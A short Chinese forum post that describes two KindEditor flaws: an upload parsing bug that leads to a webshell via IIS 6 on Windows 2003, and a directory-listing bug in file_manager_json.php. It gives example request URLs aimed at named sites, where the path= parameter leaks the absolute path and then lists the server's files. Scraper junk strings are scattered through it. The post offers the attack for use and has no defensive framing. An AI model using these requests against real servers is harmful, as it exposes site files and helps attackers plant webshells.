KindEditor上传解析漏洞和列目录漏洞

admin · 发表于 2013-1-23 09:16:19

KindEditor上传解析漏洞影响版本：= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用：利用windows 2003 IIS解析漏洞拿WEBSHELL KindEditor列目录漏洞测试版本：KindEditor 3.4.2 KindEditor 3.5.5 1.http://www.political-security.com/67cms/kindeditor/php/file_man
3 v' ]5 h# J4 I+ C: L2 d/ L5 u, c. z. h0 J5 J

KindEditor上传解析漏洞
影响版本：<= kindeditor 3.2.1(09年8月份发布的最新版)
漏洞利用：利用windows 2003 IIS解析漏洞拿WEBSHELL
6 F4 d+ Z5 s7 {8 m1 O
9 k: P$ x3 N; k3 |

KindEditor列目录漏洞
测试版本：KindEditor 3.4.2 KindEditor 3.5.5
http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/，爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//根据爆出的绝对路径，修改path的值为AppServ/www/67cms/
这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名' Y8 p/ N$ b6 g: E2 b4 [

3 n0 K3 l$ j6 A% a6 \. O

I8 A! h" R; @1 m" v* W6 L1 p0 Y0 E; B& A1 v: h5 `6 U+ c
5 Q7 [) G& ]) {

		自动登录	找回密码
密码			立即注册